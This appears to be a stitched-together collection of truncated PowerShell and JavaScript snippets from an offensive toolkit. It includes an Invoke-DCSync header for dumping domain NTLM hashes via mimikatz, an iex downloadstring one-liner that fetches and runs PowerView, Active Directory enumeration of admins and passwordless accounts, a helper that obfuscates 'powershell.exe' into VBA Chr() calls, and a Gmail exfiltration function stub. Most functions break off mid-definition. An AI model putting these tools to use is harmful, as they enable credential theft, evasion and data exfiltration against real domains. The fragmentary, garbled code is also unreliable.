function Invoke-DCSync
{
<#
.SYNOPSIS
Uses dcsync from mimikatz to collect NTLM hashes from the domain.
Author: @monoxgas
Improved by: @harmj0y
# Download and invoke PowerView:
iex(new-object system.net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')
# All admin users of default domain:
$filename = 'admins_default_domain'; $out = Get-NetUser -AdminCount; Export-Clixml $filename'.out' -InputObject $out; "All admins in the domain. Count: $($out.count)" > $filename'.txt'; $out | select samaccountname, whencreated, lastlogontimestamp, pwdlastset, displayname | sort lastlogontimestamp | ft -wrap -autosize >> $filename'.txt'
# All enabled users (including admins) with no-password setting
$filename = 'users_no_password_default_domain'; $out = Get-NetUser -Filter "(&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=32)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"; Export-Clixml $filename'.out' -InputObject $out; "All enabled users (including admins) with no-password setting. Means this users could have weak passwords or even no password at all. Count: $($out.count)
// String to convert into a VBA Chr() concatenation
var to_chr = "powershell.exe";
var return_string = "";
// Maximum number of Chr() calls emitted per output line
var chars_max_return = 60;
for (var x = 0, len = to_chr.length; x < len; x++) {
    return_string += 'Chr(' + to_chr[x].charCodeAt(0) + ') & ';
    // Flush a full line, dropping the trailing " & " separator
    if ((x > 0) && ((x % chars_max_return) == 0)) {
        console.log(return_string.substr(0, return_string.length - 3));
        return_string = "";
    }
}
// Print whatever remains after the last full line
console.log(return_string.substr(0, return_string.length - 3));
function Do-GmailExfiltration
{
[CmdletBinding()]
param(
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeLine = $True)]
[String]
$Data,
[Parameter(Position = 1, Mandatory = $True)]
[String]
function Invoke-ExcelTransposing {
[CmdletBinding()]
[OutputType([psobject])]
param(
[Parameter(Mandatory=$true, ValueFromPipelineByPropertyName=$true)]
[string] $FileName,
[Parameter(Mandatory=$false, ValueFromPipelineByPropertyName=$true)]
[string] $SheetName='Sheet1'
)
function Invoke-WinMI
{
[CmdletBinding(DefaultParameterSetName="Command")]
Param(
[Parameter(Position = 0)]
[String[]]
$ComputerName,
[Parameter(ParameterSetName = "CustomCommand", Position = 1)]
##
#
# PowerShell script to retrieve a list of all Domain Controllers on a domain, including the StartTime (last reboot) of each DC.
# Useful:
# - To determine which servers could be affected by an unpatched vulnerability.
# - To determine which servers could hold more credentials in memory.
# ###
# No admin privilege required to run this script.
# PowerShell version 2 is required.
# ###
##
#
# PowerShell script to retrieve the StartTime (last reboot) of given computers.
# Useful:
# - To determine which servers could be affected by an unpatched vulnerability.
# - To determine which servers could hold more credentials in memory.
# ###
# No admin privilege required to run this script.
# PowerShell version 2 is required.
# ###
function Get-NetworkStatistics {
<#
.SYNOPSIS
Display current TCP/IP connections for local or remote system
.FUNCTIONALITY
Computers
.DESCRIPTION
Display current TCP/IP connections for local or remote system. Includes the process ID (PID) and process name for each connection.
# Deprecated.
# Usage:
# nmap 'grepable' scan: nmap -oG outputfile.txt --open google.com
# when the scan finishes, run:
# Get-Content outputfile.txt | Convert-NmapOutput
#
function Convert-NmapOutput {
[CmdletBinding()]
[OutputType([psobject])]